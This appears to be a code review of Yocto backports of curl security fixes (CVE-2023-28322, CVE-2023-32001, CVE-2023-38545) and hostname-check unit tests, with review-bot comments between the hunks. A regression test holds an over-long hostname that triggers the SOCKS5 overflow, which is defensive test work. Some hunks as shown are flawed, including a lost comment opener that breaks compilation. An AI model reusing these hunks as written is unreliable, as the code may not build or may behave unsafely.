123+Curl_cert_hostcheck unit tests
124+</name>
125 </client>
126-
127 </testcase>
128--- a/tests/unit/unit1397.c
129+++ b/tests/unit/unit1397.c
130@@ -21,8 +21,6 @@
131 ***************************************************************************/
132 #include "curlcheck.h"
133
134-#include "hostcheck.h" /* from the lib dir */
135-
136 static CURLcode unit_setup(void)
137 {
138 return CURLE_OK;
139@@ -30,50 +28,94 @@ static CURLcode unit_setup(void)
140
141 static void unit_stop(void)
142 {
143- /* done before shutting down and exiting */
144 }
145
146-UNITTEST_START
147+* only these backends define the tested functions */
148+#if defined(USE_OPENSSL) || defined(USE_GSKIT) || \
149+ defined(USE_SCHANNEL)
150+#include "hostcheck.h"
151+struct testcase {
152+ const char *host;
153+ const char *pattern;
154+ bool match;
155+};
156+
157+static struct testcase tests[] = {
158+ {"", "", FALSE},
159+ {"a", "", FALSE},
160+ {"", "b", FALSE},
161+ {"a", "b", FALSE},
162+ {"aa", "bb", FALSE},
163+ {"\xff", "\xff", TRUE},
164+ {"aa.aa.aa", "aa.aa.bb", FALSE},
165+ {"aa.aa.aa", "aa.aa.aa", TRUE},
166+ {"aa.aa.aa", "*.aa.bb", FALSE},
167+ {"aa.aa.aa", "*.aa.aa", TRUE},
168+ {"192.168.0.1", "192.168.0.1", TRUE},
169+ {"192.168.0.1", "*.168.0.1", FALSE},
170+ {"192.168.0.1", "*.0.1", FALSE},
171+ {"h.ello", "*.ello", FALSE},
172+ {"h.ello.", "*.ello", FALSE},
173+ {"h.ello", "*.ello.", FALSE},
174+ {"h.e.llo", "*.e.llo", TRUE},
175+ {"h.e.llo", " *.e.llo", FALSE},
176+ {" h.e.llo", "*.e.llo", TRUE},
177+ {"h.e.llo.", "*.e.llo", TRUE},
178+ {"*.e.llo.", "*.e.llo", TRUE},
179+ {"************.e.llo.", "*.e.llo", TRUE},
180+ {"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
181+ "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
182+ "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
183+ "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"
184+ "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
185+ ".e.llo.", "*.e.llo", TRUE},
186+ {"\xfe\xfe.e.llo.", "*.e.llo", TRUE},
187+ {"h.e.llo.", "*.e.llo.", TRUE},
188+ {"h.e.llo", "*.e.llo.", TRUE},
189+ {".h.e.llo", "*.e.llo.", FALSE},
190+ {"h.e.llo", "*.*.llo.", FALSE},
191+ {"h.e.llo", "h.*.llo", FALSE},
192+ {"h.e.llo", "h.e.*", FALSE},
193+ {"hello", "*.ello", FALSE},
194+ {"hello", "**llo", FALSE},
195+ {"bar.foo.example.com", "*.example.com", FALSE},
196+ {"foo.example.com", "*.example.com", TRUE},
197+ {"baz.example.net", "b*z.example.net", FALSE},
198+ {"foobaz.example.net", "*baz.example.net", FALSE},
199+ {"xn--l8j.example.local", "x*.example.local", FALSE},
200+ {"xn--l8j.example.net", "*.example.net", TRUE},
201+ {"xn--l8j.example.net", "*j.example.net", FALSE},
202+ {"xn--l8j.example.net", "xn--l8j.example.net", TRUE},
203+ {"xn--l8j.example.net", "xn--l8j.*.net", FALSE},
204+ {"xl8j.example.net", "*.example.net", TRUE},
205+ {"fe80::3285:a9ff:fe46:b619", "*::3285:a9ff:fe46:b619", FALSE},
206+ {"fe80::3285:a9ff:fe46:b619", "fe80::3285:a9ff:fe46:b619", TRUE},
207+ {NULL, NULL, FALSE}
208+};
209
210-/* only these backends define the tested functions */
211-#if defined(USE_OPENSSL) || defined(USE_GSKIT)
212+UNITTEST_START
213+{
214+ int i;
215+ for(i = 0; tests[i].host; i++) {
216+ if(tests[i].match != Curl_cert_hostcheck(tests[i].pattern,
217+ tests[i].host)) {
218+ fprintf(stderr,
219+ "HOST: %s\n"
220+ "PTRN: %s\n"
221+ "did %sMATCH\n",
222+ tests[i].host,
223+ tests[i].pattern,
224+ tests[i].match ? "NOT ": "");
225+ unitfail++;
226+ }
227+ }
228+}
229
230- /* here you start doing things and checking that the results are good */
231+UNITTEST_STOP
232+#else
233
234-fail_unless(Curl_cert_hostcheck("www.example.com", "www.example.com"),
235- "good 1");
236-fail_unless(Curl_cert_hostcheck("*.example.com", "www.example.com"),
237- "good 2");
238-fail_unless(Curl_cert_hostcheck("xxx*.example.com", "xxxwww.example.com"),
239- "good 3");
240-fail_unless(Curl_cert_hostcheck("f*.example.com", "foo.example.com"),
241- "good 4");
242-fail_unless(Curl_cert_hostcheck("192.168.0.0", "192.168.0.0"),
243- "good 5");
244-
245-fail_if(Curl_cert_hostcheck("xxx.example.com", "www.example.com"), "bad 1");
246-fail_if(Curl_cert_hostcheck("*", "www.example.com"), "bad 2");
247-fail_if(Curl_cert_hostcheck("*.*.com", "www.example.com"), "bad 3");
248-fail_if(Curl_cert_hostcheck("*.example.com", "baa.foo.example.com"), "bad 4");
249-fail_if(Curl_cert_hostcheck("f*.example.com", "baa.example.com"), "bad 5");
250-fail_if(Curl_cert_hostcheck("*.com", "example.com"), "bad 6");
251-fail_if(Curl_cert_hostcheck("*fail.com", "example.com"), "bad 7");
252-fail_if(Curl_cert_hostcheck("*.example.", "www.example."), "bad 8");
253-fail_if(Curl_cert_hostcheck("*.example.", "www.example"), "bad 9");
254-fail_if(Curl_cert_hostcheck("", "www"), "bad 10");
255-fail_if(Curl_cert_hostcheck("*", "www"), "bad 11");
256-fail_if(Curl_cert_hostcheck("*.168.0.0", "192.168.0.0"), "bad 12");
257-fail_if(Curl_cert_hostcheck("www.example.com", "192.168.0.0"), "bad 13");
258-
259-#ifdef ENABLE_IPV6
260-fail_if(Curl_cert_hostcheck("*::3285:a9ff:fe46:b619",
261- "fe80::3285:a9ff:fe46:b619"), "bad 14");
262-fail_unless(Curl_cert_hostcheck("fe80::3285:a9ff:fe46:b619",
263- "fe80::3285:a9ff:fe46:b619"), "good 6");
264-#endif
265+UNITTEST_START
266
267+UNITTEST_STOP
268 #endif
269
270- /* you end the test code like this: */
271-
272-UNITTEST_STOP
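Review bot: In the tests/unit/unit1397.c hunk the added line `* only these backends define the tested functions */` has lost its `/` comment opener, so as shown here the file would not compile wherever the unit tests are built; it should read `/* only these backends define the tested functions */`. The diffstat also lists tests/unit/Makefile.am and tests/unit/Makefile.inc, but this backport carries no hunks for them, so the patch header should say those parts were dropped. In lib/hostcheck.c, `suffixlen = pattern_label_end - (pattern + 1)` looks like it is always zero once the pattern is known to start with `*.`, which would make the final `strncasecompare` a no-op. A short comment saying the real comparison happens in the lines outside this hunk would help the next reader, since hostmatch's body continues outside the hunks.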
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28322.patch b/meta/recipes-support/curl/curl/CVE-2023-28322.patch
new file mode 100644
index 0000000000..9351a2c286
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28322.patch
@@ -0,0 +1,380 @@
1CVE: CVE-2023-28322
2Upstream-Status: Backport [ import patch from ubuntu curl_7.68.0-1ubuntu2.20
3upstream https://github.com/curl/curl/commit/7815647d6582c0a4900be2e1de ]
4Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
5
6Backport of:
7
8From 7815647d6582c0a4900be2e1de6c5e61272c496b Mon Sep 17 00:00:00 2001
9From: Daniel Stenberg <daniel@haxx.se>
10Date: Tue, 25 Apr 2023 08:28:01 +0200
11Subject: [PATCH] lib: unify the upload/method handling
12
13By making sure we set state.upload based on the set.method value and not
14independently as set.upload, we reduce confusion and mixup risks, both
15internally and externally.
16
17Closes #11017
18---
19 lib/curl_rtmp.c | 4 ++--
20 lib/file.c | 4 ++--
21 lib/ftp.c | 8 ++++----
22 lib/http.c | 4 ++--
23 lib/imap.c | 6 +++---
24 lib/rtsp.c | 4 ++--
25 lib/setopt.c | 6 ++----
26 lib/smb.c | 6 +++---
27 lib/smtp.c | 4 ++--
28 lib/tftp.c | 8 ++++----
29 lib/transfer.c | 4 ++--
30 lib/urldata.h | 2 +-
31 lib/vssh/libssh.c | 6 +++---
32 lib/vssh/libssh2.c | 6 +++---
33 lib/vssh/wolfssh.c | 2 +-
34 15 files changed, 36 insertions(+), 38 deletions(-)
35
36--- a/lib/curl_rtmp.c
37+++ b/lib/curl_rtmp.c
38@@ -213,7 +213,7 @@ static CURLcode rtmp_connect(struct conn
39 /* We have to know if it's a write before we send the
40 * connect request packet
41 */
42- if(conn->data->set.upload)
43+ if(conn->data->state.upload)
44 r->Link.protocol |= RTMP_FEATURE_WRITE;
45
46 /* For plain streams, use the buffer toggle trick to keep data flowing */
47@@ -245,7 +245,7 @@ static CURLcode rtmp_do(struct connectda
48 if(!RTMP_ConnectStream(r, 0))
49 return CURLE_FAILED_INIT;
50
51- if(conn->data->set.upload) {
52+ if(conn->data->state.upload) {
53 Curl_pgrsSetUploadSize(data, data->state.infilesize);
54 Curl_setup_transfer(data, -1, -1, FALSE, FIRSTSOCKET);
55 }
56--- a/lib/file.c
57+++ b/lib/file.c
58@@ -198,7 +198,7 @@ static CURLcode file_connect(struct conn
59 file->freepath = real_path; /* free this when done */
60
61 file->fd = fd;
62- if(!data->set.upload && (fd == -1)) {
63+ if(!data->state.upload && (fd == -1)) {
64 failf(data, "Couldn't open file %s", data->state.up.path);
65 file_done(conn, CURLE_FILE_COULDNT_READ_FILE, FALSE);
66 return CURLE_FILE_COULDNT_READ_FILE;
67@@ -390,7 +390,7 @@ static CURLcode file_do(struct connectda
68
69 Curl_pgrsStartNow(data);
70
71- if(data->set.upload)
72+ if(data->state.upload)
73 return file_upload(conn);
74
75 file = conn->data->req.protop;
76--- a/lib/ftp.c
77+++ b/lib/ftp.c
78@@ -1371,7 +1371,7 @@ static CURLcode ftp_state_prepare_transf
79 data->set.str[STRING_CUSTOMREQUEST]:
80 (data->set.ftp_list_only?"NLST":"LIST"));
81 }
82- else if(data->set.upload) {
83+ else if(data->state.upload) {
84 PPSENDF(&conn->proto.ftpc.pp, "PRET STOR %s", conn->proto.ftpc.file);
85 }
86 else {
87@@ -3303,7 +3303,7 @@ static CURLcode ftp_done(struct connectd
88 /* the response code from the transfer showed an error already so no
89 use checking further */
90 ;
91- else if(data->set.upload) {
92+ else if(data->state.upload) {
93 if((-1 != data->state.infilesize) &&
94 (data->state.infilesize != data->req.writebytecount) &&
95 !data->set.crlf &&
96@@ -3570,7 +3570,7 @@ static CURLcode ftp_do_more(struct conne
97 connected back to us */
98 }
99 }
100- else if(data->set.upload) {
101+ else if(data->state.upload) {
102 result = ftp_nb_type(conn, data->set.prefer_ascii, FTP_STOR_TYPE);
103 if(result)
104 return result;
105@@ -4209,7 +4209,7 @@ CURLcode ftp_parse_url_path(struct conne
106 ftpc->file = NULL; /* instead of point to a zero byte,
107 we make it a NULL pointer */
108
109- if(data->set.upload && !ftpc->file && (ftp->transfer == FTPTRANSFER_BODY)) {
110+ if(data->state.upload && !ftpc->file && (ftp->transfer == FTPTRANSFER_BODY)) {
111 /* We need a file name when uploading. Return error! */
112 failf(data, "Uploading to a URL without a file name!");
113 free(rawPath);
114--- a/lib/http.c
115+++ b/lib/http.c
116@@ -2080,7 +2080,7 @@ CURLcode Curl_http(struct connectdata *c
117 }
118
119 if((conn->handler->protocol&(PROTO_FAMILY_HTTP|CURLPROTO_FTP)) &&
120- data->set.upload) {
121+ data->state.upload) {
122 httpreq = HTTPREQ_PUT;
123 }
124
125@@ -2261,7 +2261,7 @@ CURLcode Curl_http(struct connectdata *c
126 if((conn->handler->protocol & PROTO_FAMILY_HTTP) &&
127 (((httpreq == HTTPREQ_POST_MIME || httpreq == HTTPREQ_POST_FORM) &&
128 http->postsize < 0) ||
129- ((data->set.upload || httpreq == HTTPREQ_POST) &&
130+ ((data->state.upload || httpreq == HTTPREQ_POST) &&
131 data->state.infilesize == -1))) {
132 if(conn->bits.authneg)
133 /* don't enable chunked during auth neg */
134--- a/lib/imap.c
135+++ b/lib/imap.c
136@@ -1469,11 +1469,11 @@ static CURLcode imap_done(struct connect
137 result = status; /* use the already set error code */
138 }
139 else if(!data->set.connect_only && !imap->custom &&
140- (imap->uid || imap->mindex || data->set.upload ||
141+ (imap->uid || imap->mindex || data->state.upload ||
142 data->set.mimepost.kind != MIMEKIND_NONE)) {
143 /* Handle responses after FETCH or APPEND transfer has finished */
144
145- if(!data->set.upload && data->set.mimepost.kind == MIMEKIND_NONE)
146+ if(!data->state.upload && data->set.mimepost.kind == MIMEKIND_NONE)
147 state(conn, IMAP_FETCH_FINAL);
148 else {
149 /* End the APPEND command first by sending an empty line */
150@@ -1539,7 +1539,7 @@ static CURLcode imap_perform(struct conn
151 selected = TRUE;
152
153 /* Start the first command in the DO phase */
154- if(conn->data->set.upload || data->set.mimepost.kind != MIMEKIND_NONE)
155+ if(conn->data->state.upload || data->set.mimepost.kind != MIMEKIND_NONE)
156 /* APPEND can be executed directly */
157 result = imap_perform_append(conn);
158 else if(imap->custom && (selected || !imap->mailbox))
159--- a/lib/rtsp.c
160+++ b/lib/rtsp.c
161@@ -499,7 +499,7 @@ static CURLcode rtsp_do(struct connectda
162 rtspreq == RTSPREQ_SET_PARAMETER ||
163 rtspreq == RTSPREQ_GET_PARAMETER) {
164
165- if(data->set.upload) {
166+ if(data->state.upload) {
167 putsize = data->state.infilesize;
168 data->set.httpreq = HTTPREQ_PUT;
169
170@@ -518,7 +518,7 @@ static CURLcode rtsp_do(struct connectda
171 result =
172 Curl_add_bufferf(&req_buffer,
173 "Content-Length: %" CURL_FORMAT_CURL_OFF_T"\r\n",
174- (data->set.upload ? putsize : postsize));
175+ (data->state.upload ? putsize : postsize));
176 if(result)
177 return result;
178 }
179--- a/lib/setopt.c
180+++ b/lib/setopt.c
181@@ -258,8 +258,8 @@ CURLcode Curl_vsetopt(struct Curl_easy *
182 * We want to sent data to the remote host. If this is HTTP, that equals
183 * using the PUT request.
184 */
185- data->set.upload = (0 != va_arg(param, long)) ? TRUE : FALSE;
186- if(data->set.upload) {
187+ arg = va_arg(param, long);
188+ if(arg) {
189 /* If this is HTTP, PUT is what's needed to "upload" */
190 data->set.httpreq = HTTPREQ_PUT;
191 data->set.opt_no_body = FALSE; /* this is implied */
192@@ -486,7 +486,6 @@ CURLcode Curl_vsetopt(struct Curl_easy *
193 }
194 else
195 data->set.httpreq = HTTPREQ_GET;
196- data->set.upload = FALSE;
197 break;
198
199 case CURLOPT_COPYPOSTFIELDS:
200@@ -797,7 +796,6 @@ CURLcode Curl_vsetopt(struct Curl_easy *
201 */
202 if(va_arg(param, long)) {
203 data->set.httpreq = HTTPREQ_GET;
204- data->set.upload = FALSE; /* switch off upload */
205 data->set.opt_no_body = FALSE; /* this is implied */
206 }
207 break;
208--- a/lib/smb.c
209+++ b/lib/smb.c
210@@ -516,7 +516,7 @@ static CURLcode smb_send_open(struct con
211 byte_count = strlen(req->path);
212 msg.name_length = smb_swap16((unsigned short)byte_count);
213 msg.share_access = smb_swap32(SMB_FILE_SHARE_ALL);
214- if(conn->data->set.upload) {
215+ if(conn->data->state.upload) {
216 msg.access = smb_swap32(SMB_GENERIC_READ | SMB_GENERIC_WRITE);
217 msg.create_disposition = smb_swap32(SMB_FILE_OVERWRITE_IF);
218 }
219@@ -792,7 +792,7 @@ static CURLcode smb_request_state(struct
220 smb_m = (const struct smb_nt_create_response*) msg;
221 req->fid = smb_swap16(smb_m->fid);
222 conn->data->req.offset = 0;
223- if(conn->data->set.upload) {
224+ if(conn->data->state.upload) {
225 conn->data->req.size = conn->data->state.infilesize;
226 Curl_pgrsSetUploadSize(conn->data, conn->data->req.size);
227 next_state = SMB_UPLOAD;
228--- a/lib/smtp.c
229+++ b/lib/smtp.c
230@@ -1210,7 +1210,7 @@ static CURLcode smtp_done(struct connect
231 result = status; /* use the already set error code */
232 }
233 else if(!data->set.connect_only && data->set.mail_rcpt &&
234- (data->set.upload || data->set.mimepost.kind)) {
235+ (data->state.upload || data->set.mimepost.kind)) {
236 /* Calculate the EOB taking into account any terminating CRLF from the
237 previous line of the email or the CRLF of the DATA command when there
238 is "no mail data". RFC-5321, sect. 4.1.1.4.
239@@ -1297,7 +1297,7 @@ static CURLcode smtp_perform(struct conn
240 smtp->eob = 2;
241
242 /* Start the first command in the DO phase */
243- if((data->set.upload || data->set.mimepost.kind) && data->set.mail_rcpt)
244+ if((data->state.upload || data->set.mimepost.kind) && data->set.mail_rcpt)
245 /* MAIL transfer */
246 result = smtp_perform_mail(conn);
247 else
248--- a/lib/tftp.c
249+++ b/lib/tftp.c
250@@ -390,7 +390,7 @@ static CURLcode tftp_parse_option_ack(tf
251
252 /* tsize should be ignored on upload: Who cares about the size of the
253 remote file? */
254- if(!data->set.upload) {
255+ if(!data->state.upload) {
256 if(!tsize) {
257 failf(data, "invalid tsize -:%s:- value in OACK packet", value);
258 return CURLE_TFTP_ILLEGAL;
259@@ -470,7 +470,7 @@ static CURLcode tftp_send_first(tftp_sta
260 return result;
261 }
262
263- if(data->set.upload) {
264+ if(data->state.upload) {
265 /* If we are uploading, send an WRQ */
266 setpacketevent(&state->spacket, TFTP_EVENT_WRQ);
267 state->conn->data->req.upload_fromhere =
268@@ -505,7 +505,7 @@ static CURLcode tftp_send_first(tftp_sta
269 if(!data->set.tftp_no_options) {
270 char buf[64];
271 /* add tsize option */
272- if(data->set.upload && (data->state.infilesize != -1))
273+ if(data->state.upload && (data->state.infilesize != -1))
274 msnprintf(buf, sizeof(buf), "%" CURL_FORMAT_CURL_OFF_T,
275 data->state.infilesize);
276 else
277@@ -559,7 +559,7 @@ static CURLcode tftp_send_first(tftp_sta
278 break;
279
280 case TFTP_EVENT_OACK:
281- if(data->set.upload) {
282+ if(data->state.upload) {
283 result = tftp_connect_for_tx(state, event);
284 }
285 else {
286--- a/lib/transfer.c
287+++ b/lib/transfer.c
288@@ -1405,6 +1405,7 @@ void Curl_init_CONNECT(struct Curl_easy
289 {
290 data->state.fread_func = data->set.fread_func_set;
291 data->state.in = data->set.in_set;
292+ data->state.upload = (data->set.httpreq == HTTPREQ_PUT);
293 }
294
295 /*
296@@ -1816,7 +1817,7 @@ CURLcode Curl_retry_request(struct conne
297
298 /* if we're talking upload, we can't do the checks below, unless the protocol
299 is HTTP as when uploading over HTTP we will still get a response */
300- if(data->set.upload &&
301+ if(data->state.upload &&
302 !(conn->handler->protocol&(PROTO_FAMILY_HTTP|CURLPROTO_RTSP)))
303 return CURLE_OK;
304
305--- a/lib/urldata.h
306+++ b/lib/urldata.h
307@@ -1427,6 +1427,7 @@ struct UrlState {
308 BIT(stream_depends_e); /* set or don't set the Exclusive bit */
309 BIT(previouslypending); /* this transfer WAS in the multi->pending queue */
310 BIT(cookie_engine);
311+ BIT(upload); /* upload request */
312 };
313
314
315@@ -1762,7 +1763,6 @@ struct UserDefined {
316 BIT(http_auto_referer); /* set "correct" referer when following
317 location: */
318 BIT(opt_no_body); /* as set with CURLOPT_NOBODY */
319- BIT(upload); /* upload request */
320 BIT(verbose); /* output verbosity */
321 BIT(krb); /* Kerberos connection requested */
322 BIT(reuse_forbid); /* forbidden to be reused, close after use */
323--- a/lib/vssh/libssh.c
324+++ b/lib/vssh/libssh.c
325@@ -1076,7 +1076,7 @@ static CURLcode myssh_statemach_act(stru
326 }
327
328 case SSH_SFTP_TRANS_INIT:
329- if(data->set.upload)
330+ if(data->state.upload)
331 state(conn, SSH_SFTP_UPLOAD_INIT);
332 else {
333 if(protop->path[strlen(protop->path)-1] == '/')
334@@ -1686,7 +1686,7 @@ static CURLcode myssh_statemach_act(stru
335 /* Functions from the SCP subsystem cannot handle/return SSH_AGAIN */
336 ssh_set_blocking(sshc->ssh_session, 1);
337
338- if(data->set.upload) {
339+ if(data->state.upload) {
340 if(data->state.infilesize < 0) {
341 failf(data, "SCP requires a known file size for upload");
342 sshc->actualcode = CURLE_UPLOAD_FAILED;
343@@ -1787,7 +1787,7 @@ static CURLcode myssh_statemach_act(stru
344 break;
345 }
346 case SSH_SCP_DONE:
347- if(data->set.upload)
348+ if(data->state.upload)
349 state(conn, SSH_SCP_SEND_EOF);
350 else
351 state(conn, SSH_SCP_CHANNEL_FREE);
352--- a/lib/vssh/libssh2.c
353+++ b/lib/vssh/libssh2.c
354@@ -1664,7 +1664,7 @@ static CURLcode ssh_statemach_act(struct
355 }
356
357 case SSH_SFTP_TRANS_INIT:
358- if(data->set.upload)
359+ if(data->state.upload)
360 state(conn, SSH_SFTP_UPLOAD_INIT);
361 else {
362 if(sftp_scp->path[strlen(sftp_scp->path)-1] == '/')
363@@ -2366,7 +2366,7 @@ static CURLcode ssh_statemach_act(struct
364 break;
365 }
366
367- if(data->set.upload) {
368+ if(data->state.upload) {
369 if(data->state.infilesize < 0) {
370 failf(data, "SCP requires a known file size for upload");
371 sshc->actualcode = CURLE_UPLOAD_FAILED;
372@@ -2504,7 +2504,7 @@ static CURLcode ssh_statemach_act(struct
373 break;
374
375 case SSH_SCP_DONE:
376- if(data->set.upload)
377+ if(data->state.upload)
378 state(conn, SSH_SCP_SEND_EOF);
379 else
380 state(conn, SSH_SCP_CHANNEL_FREE);
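Review bot: The new assignment `data->state.upload = (data->set.httpreq == HTTPREQ_PUT);` in Curl_init_CONNECT (lib/transfer.c hunk) is the only place this patch sets the flag, and it carries no comment saying so. I would add `/* upload state follows the configured method; there is no separate set.upload any more */` above it and extend the urldata.h comment to `BIT(upload); /* upload request, derived from set.httpreq in Curl_init_CONNECT() */`. The lib/rtsp.c hunk still shows `data->set.httpreq = HTTPREQ_PUT;` as context inside `if(data->state.upload)`, a write to the user settings during a request that presumably persists on a reused handle; whether that is still wanted after this unification deserves a look. Because `BIT(upload)` is removed from struct UserDefined, any reader of `set.upload` this backport missed will fail at build time rather than misbehave silently.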
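--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-32001.patch
@@ -0,0 +1,38 @@
+From 0c667188e0c6cda615a036b8a2b4125f2c404dde Mon Sep 17 00:00:00 2001
+From: SaltyMilk <soufiane.elmelcaoui@gmail.com>
+Date: Mon, 10 Jul 2023 21:43:28 +0200
+Subject: [PATCH] fopen: optimize
+
+Closes #11419
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/0c667188e0c6cda615a036b8a2b4125f2c404dde]
+CVE: CVE-2023-32001
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ lib/fopen.c | 12 ++++++------
+ 1 file changed, 6 insertions(+), 6 deletions(-)
+
+diff --git a/lib/fopen.c b/lib/fopen.c
+index c9c9e3d6e73a2..b6e3cadddef65 100644
+--- a/lib/fopen.c
++++ b/lib/fopen.c
+@@ -56,13 +56,13 @@ CURLcode Curl_fopen(struct Curl_easy *data, const char *filename,
+ int fd = -1;
+ *tempname = NULL;
+
+- if(stat(filename, &sb) == -1 || !S_ISREG(sb.st_mode)) {
+- /* a non-regular file, fallback to direct fopen() */
+- *fh = fopen(filename, FOPEN_WRITETEXT);
+- if(*fh)
+- return CURLE_OK;
++ *fh = fopen(filename, FOPEN_WRITETEXT);
++ if(!*fh)
+ goto fail;
+- }
++ if(fstat(fileno(*fh), &sb) == -1 || !S_ISREG(sb.st_mode))
++ return CURLE_OK;
++ fclose(*fh);
++ *fh = NULL;
+
+ result = Curl_rand_hex(data, randsuffix, sizeof(randsuffix));
+ if(result)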
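Review bot: Curl_fopen now opens `filename` with `FOPEN_WRITETEXT` before it knows the file type, so if that mode truncates on open (as the name suggests) an existing regular file is emptied before the temp-file path runs, and a later `goto fail` would leave it empty. The added code also has no comment explaining why the check moved from `stat()` on the path to `fstat()` on the open stream; I would add `/* open first, then fstat() the descriptor, so the type check applies to the file that was actually opened */` above the `fopen` call. The patch header only says "fopen: optimize", so a line stating what CVE-2023-32001 is about would help whoever audits this backport. The function body continues outside the hunk.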
diff --git a/meta/recipes-support/curl/curl/CVE-2023-38545.patch b/meta/recipes-support/curl/curl/CVE-2023-38545.patch
new file mode 100644
index 0000000000..c6b6726886
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-38545.patch
@@ -0,0 +1,148 @@
1From 600a1caeb2312fdee5ef1caf7d613c12a8b2424a Mon Sep 17 00:00:00 2001
2From: Mike Crowe <mac@mcrowe.com>
3Date: Wed, 11 Oct 2023 20:50:28 +0100
4Subject: [PATCH] socks: return error if hostname too long for remote resolve
5To: libcurl development <curl-library@cool.haxx.se>
6
7Prior to this change the state machine attempted to change the remote
8resolve to a local resolve if the hostname was longer than 255
9characters. Unfortunately that did not work as intended and caused a
10security issue.
11
12Name resolvers cannot resolve hostnames longer than 255 characters.
13
14Bug: https://curl.se/docs/CVE-2023-38545.html
15
16Unfortunately CURLE_PROXY and CURLPX_LONG_HOSTNAME were introduced in
177.73.0 so they can't be used in 7.69.1. Let's use
18CURLE_COULDNT_RESOLVE_HOST as the best available alternative and update
19the test appropriately.
20
21libcurl's test support has been improved considerably since 7.69.1 which
22means that the test must be modified to remove use of %VERSION and
23%TESTNUMBER and the stderr output can no longer be checked.
24
25CVE: CVE-2023-38545
26Upstream-Status: Backport [fb4415d8aee6c1045be932a34fe6107c2f5ed147]
27Signed-off-by: Mike Crowe <mac@mcrowe.com>
28---
29 lib/socks.c | 13 +++++----
30 tests/data/Makefile.inc | 2 +-
31 tests/data/test728 | 60 +++++++++++++++++++++++++++++++++++++++++
32 3 files changed, 69 insertions(+), 6 deletions(-)
33 create mode 100644 tests/data/test728
34
35diff --git a/lib/socks.c b/lib/socks.c
36index 37099130e..f3bf40533 100644
37--- a/lib/socks.c
38+++ b/lib/socks.c
39@@ -521,11 +521,14 @@ CURLcode Curl_SOCKS5(const char *proxy_user,
40 infof(conn->data, "SOCKS5: connecting to HTTP proxy %s port %d\n",
41 hostname, remote_port);
42
43- /* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
44+ /* RFC1928 chapter 5 specifies max 255 chars for domain name in packet. */
45 if(!socks5_resolve_local && hostname_len > 255) {
46- infof(conn->data, "SOCKS5: server resolving disabled for hostnames of "
47- "length > 255 [actual len=%zu]\n", hostname_len);
48- socks5_resolve_local = TRUE;
49+ failf(data, "SOCKS5: the destination hostname is too long to be "
50+ "resolved remotely by the proxy.");
51+ /* This version of libcurl doesn't have CURLE_PROXY and
52+ * therefore CURLPX_LONG_HOSTNAME, so let's report the best we
53+ * can. */
54+ return CURLE_COULDNT_RESOLVE_HOST;
55 }
56
57 if(auth & ~(CURLAUTH_BASIC | CURLAUTH_GSSAPI))
58@@ -837,7 +840,7 @@ CURLcode Curl_SOCKS5(const char *proxy_user,
59
60 if(!socks5_resolve_local) {
61 socksreq[len++] = 3; /* ATYP: domain name = 3 */
62- socksreq[len++] = (char) hostname_len; /* one byte address length */
63+ socksreq[len++] = (unsigned char) hostname_len; /* one byte length */
64 memcpy(&socksreq[len], hostname, hostname_len); /* address w/o NULL */
65 len += hostname_len;
66 infof(data, "SOCKS5 connect to %s:%d (remotely resolved)\n",
67diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
68index 3d8565c36..5ee2284ff 100644
69--- a/tests/data/Makefile.inc
70+++ b/tests/data/Makefile.inc
71@@ -89,7 +89,7 @@ test662 test663 test664 test665 test666 test667 test668 \
72 test670 test671 test672 test673 \
73 \
74 test700 test701 test702 test703 test704 test705 test706 test707 test708 \
75-test709 test710 test711 test712 test713 test714 test715 test716 test717 \
76+test709 test710 test711 test712 test713 test714 test715 test716 test717 test728 \
77 \
78 test800 test801 test802 test803 test804 test805 test806 test807 test808 \
79 test809 test810 test811 test812 test813 test814 test815 test816 test817 \
80diff --git a/tests/data/test728 b/tests/data/test728
81new file mode 100644
82index 000000000..7b1d8b2f3
83--- /dev/null
84+++ b/tests/data/test728
85@@ -0,0 +1,60 @@
86+<testcase>
87+<info>
88+<keywords>
89+HTTP
90+HTTP GET
91+SOCKS5
92+SOCKS5h
93+followlocation
94+</keywords>
95+</info>
96+
97+#
98+# Server-side
99+<reply>
100+# The hostname in this redirect is 256 characters and too long (> 255) for
101+# SOCKS5 remote resolve. curl must return error CURLE_PROXY in this case.
102+<data>
103+HTTP/1.1 301 Moved Permanently
104+Location: http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
105+Content-Length: 0
106+Connection: close
107+
108+</data>
109+</reply>
110+
111+#
112+# Client-side
113+<client>
114+<features>
115+proxy
116+</features>
117+<server>
118+http
119+socks5
120+</server>
121+ <name>
122+SOCKS5h with HTTP redirect to hostname too long
123+ </name>
124+ <command>
125+--no-progress-meter --location --proxy socks5h://%HOSTIP:%SOCKSPORT http://%HOSTIP:%HTTPPORT/728
126+</command>
127+</client>
128+
129+#
130+# Verify data after the test has been "shot"
131+<verify>
132+<strip>
133+^User-Agent:.*
134+</strip>
135+<protocol>
136+GET /728 HTTP/1.1
137+Host: %HOSTIP:%HTTPPORT
138+Accept: */*
139+
140+</protocol>
141+<errorcode>
142+6
143+</errorcode>
144+</verify>
145+</testcase>
146--
1472.39.2
148
